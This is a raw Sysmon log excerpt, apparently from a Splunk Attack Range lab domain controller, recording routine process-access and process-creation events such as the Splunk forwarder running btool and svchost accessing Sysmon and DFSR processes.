08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001699Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001698Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001697Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001696Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001695Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B3-5F84-4500-000000007F01}4040C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001694Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16B3-5F84-4400-000000007F01}40244028C:\Windows\system32\cmd.exe{5D479F2C-16B3-5F84-4500-000000007F01}4040C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001693Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.371{5D479F2C-16B3-5F84-4500-000000007F01}4040C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5D479F2C-16B3-5F84-4400-000000007F01}4024C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000001692Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B3-5F84-4400-000000007F01}4024C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001691Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001690Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001689Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001688Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001687Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001686Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001685Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001684Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001683Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001682Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B3-5F84-4400-000000007F01}4024C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001681Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16B2-5F84-3C00-000000007F01}38403844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5D479F2C-16B3-5F84-4400-000000007F01}4024C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001680Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.366{5D479F2C-16B3-5F84-4400-000000007F01}4024C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B2-5F84-3C00-000000007F01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001679Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-1000-000000007F01}11442188C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001678Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-1000-000000007F01}11442188C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029 10341000x80000000000000001677Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-1000-000000007F01}11442188C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac 10341000x80000000000000001676Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-1000-000000007F01}11442188C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c 10341000x80000000000000001675Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.355{5D479F2C-16A1-5F84-1000-000000007F01}11442188C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c 